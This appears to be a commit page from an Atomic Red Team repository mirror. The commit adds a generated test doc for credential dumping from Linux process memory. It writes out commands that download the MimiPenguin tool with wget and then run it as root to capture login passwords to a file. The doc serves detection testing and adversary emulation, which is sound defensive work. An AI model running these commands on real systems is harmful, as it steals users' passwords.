security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2022-03-09 16:16:04 +00:00
parent 455cd5837e
commit 82df99e7c8
6 changed files with 156 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003.007/T1003.007.md
+85
View File
@@ -10,6 +10,8 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin
- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
- [Atomic Test #3 - Capture Passwords with MimiPenguin](#atomic-test-3---capture-passwords-with-mimipenguin)
<br/>
@@ -139,4 +141,87 @@ echo "Python 2.7+ or 3.4+ must be installed"
<br/>
<br/>
## Atomic Test #3 - Capture Passwords with MimiPenguin
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
**Supported Platforms:** Linux
**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.007Test3.txt|
| MimiPenguin_Location | Path of MimiPenguin script | Path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo #{MimiPenguin_Location} > #{output_file}
cat #{output_file}
```
#### Cleanup Commands:
```bash
rm -f #{output_file} > /dev/null
```
#### Dependencies: Run with `sh`!
##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
##### Check Prereq Commands:
```sh
if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
```
##### Description: Strings must be installed
##### Check Prereq Commands:
```sh
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
sudo apt-get -y install binutils
```
##### Description: Python2 must be installed
##### Check Prereq Commands:
```sh
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
sudo apt-get -y install python2
```
##### Description: Libc-bin must be installed
##### Check Prereq Commands:
```sh
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
sudo apt-get -y install libc-bin
```
<br/>